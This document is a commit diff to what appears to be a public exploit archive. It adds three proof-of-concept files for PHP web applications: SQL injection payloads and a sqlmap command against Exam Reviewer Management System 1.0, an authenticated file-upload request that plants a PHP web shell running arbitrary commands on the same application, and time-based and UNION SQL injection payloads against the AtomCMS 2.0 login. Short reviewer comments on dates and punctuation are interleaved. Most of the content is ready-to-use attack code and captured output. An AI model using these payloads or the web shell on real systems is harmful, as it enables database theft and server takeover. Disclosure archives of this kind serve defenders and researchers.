DB: 2022-02-10
3 changes to exploits/shellcodes Exam Reviewer Management System 1.0 - ‘id’ SQL Injection Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) AtomCMS v2.0 - SQLi
This commit is contained in:
parent
41553c4004
commit
c86e2ee727
4 changed files with 271 additions and 0 deletions
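--- a/exploits/php/webapps/50725.txt
+++ b/exploits/php/webapps/50725.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
+# Date: 2022-02-18
+# Exploit Author: Juli Agarwal(@agarwaljuli)
+# Vendor Homepage:
+https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
+
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
+
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+
+
+Description – The ‘id’ parameter in Exam Reviewer Management System web
+application is vulnerable to SQL Injection
+
+Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
+
+
+
+POC:-
+
+
+
+---
+
+Parameter: id (GET)
+
+Type: boolean-based blind
+
+Title: AND boolean-based blind - WHERE or HAVING clause
+
+Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
+
+
+
+Type: error-based
+
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
+clause (FLOOR)
+
+Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
+COUNT(*),CONCAT(0x71766a7071,(SELECT
+(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
+
+
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
+AND 'vqGg'='vqGg---
+
+
+
+*SQLMAP COMMAND*
+
+
+
+*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
+<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*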
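Review bot: The `# Date: 2022-02-18` header in 50725.txt is later than the commit's own `DB: 2022-02-10` title and than the `# Date: 2022-02-08` in the sibling 50726.txt by the same author, so it presumably is a typo; it should read `# Date: 2022-02-08` or whatever date the submission actually carries. The `Description` paragraph and the `Vulnerable URL` line name the affected parameter, but the file never states whether reaching `?p=take_exam` needs a logged-in session, which is what the CSV index and readers use to rate severity; one sentence on that would complete the advisory.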
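--- a/exploits/php/webapps/50726.txt
+++ b/exploits/php/webapps/50726.txt
@@ -0,0 +1,144 @@
+# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-02-08
+# Exploit Author: Juli Agarwal(@agarwaljuli)
+# Vendor Homepage:
+https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
+
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
+
+# Version: 1.0
+# Tested on: XAMPP, Kali Linux
+
+
+
+Description – The application suffers from a remote code execution in the
+admin panel. An authenticated attacker can upload a web-shell php file in
+profile page to achieve remote code execution.
+
+
+
+POC:-
+
+
+
+==========
+
+# Request:
+
+==========
+
+POST /erms/classes/Users.php?f=save HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
+Firefox/91.0
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+X-Requested-With: XMLHttpRequest
+
+Content-Type: multipart/form-data;
+boundary=---------------------------37791356766765055891341961306
+
+Content-Length: 1004
+
+Origin: http://localhost
+
+Connection: close
+
+Referer: http://localhost/erms/admin/?page=user
+
+Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
+
+
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="id"
+
+
+
+1
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="firstname"
+
+
+
+Adminstrator
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="lastname"
+
+
+
+Admin
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="username"
+
+
+
+admin
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="password"
+
+
+
+-----------------------------37791356766765055891341961306
+
+Content-Disposition: form-data; name="img"; filename="shell.php"
+
+Content-Type: application/x-php
+
+
+
+<html>
+
+<body>
+
+<b>Remote code execution: </b><br><pre>
+
+<?php if(isset($_REQUEST['cmd'])){ echo
+"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
+
+</pre>
+
+</body>
+
+</html>
+
+
+
+-----------------------------37791356766765055891341961306—
+
+
+
+================
+
+# Webshell access:
+
+================
+
+
+
+# Webshell access via:
+
+POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
+
+
+
+# Webshell response:
+
+Remote code execution:
+
+uid=1(daemon) gid=1(daemon) groups=1(daemon)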
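Review bot: The description in 50726.txt says the upload happens on the "profile page", while the captured request's `Referer: http://localhost/erms/admin/?page=user` points at the admin user-management page and the title only says Authenticated; the advisory should state explicitly which session or role is required (presumably an admin session, judging by the Referer and the `admin panel` wording) so the severity is rated correctly. Separately, the last boundary line `-----------------------------37791356766765055891341961306—` ends in a Unicode em dash and the `Description –` line carries an en dash, which looks like smart-punctuation substitution on paste; the file should be ASCII-clean so the request body reads as it was captured.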
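--- a/exploits/php/webapps/50727.txt
+++ b/exploits/php/webapps/50727.txt
@@ -0,0 +1,60 @@
+# Exploit Title: AtomCMS v2.0 - SQLi
+# Date: 08/02/2022
+# Exploit Author: Luca Cuzzolin aka czz78
+# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
+# Version: v2.0
+# Category: Webapps
+# Tested on: Debian linux
+# CVE : CVE-2022-24223
+
+
+====================================================
+
+# PoC : SQLi :
+
+http://127.0.0.1/Atom.CMS/admin/login.php
+
+
+POST /Atom.CMS/admin/login.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
+Firefox/91.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: it,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/Atom.CMS/admin/login.php
+Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+email=test%40test.com&password=1234
+
+
+Vulnerable Payload :
+
+Parameter: email (POST)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: email=test@test.com' AND (SELECT 5613 FROM
+(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234
+Vector: AND (SELECT [RANDNUM] FROM
+(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Type: UNION query
+Title: Generic UNION query (NULL) - 6 columns
+Payload: email=test@test.com' UNION ALL SELECT
+NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--
+-&password=1234
+Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -
+---
+
+
+
+====================================================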
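Review bot: `# Date: 08/02/2022` in 50727.txt uses a day/month form that is ambiguous on its own, while the other two files in this commit use ISO `2022-02-08`; the header should be `# Date: 2022-02-08` for consistency with them and with the date column of the CSV index. A smaller point of style: `# Tested on: Debian linux` would read better as `# Tested on: Debian Linux`.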
@ -44799,3 +44799,6 @@ id,file,description,date,author,type,platform,port
|
||||||
50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
|
50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
|
||||||
50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
||||||
50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
||||||
|
50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
|
||||||
|
50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
|
||||||
|
50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,
|
||||||
|
|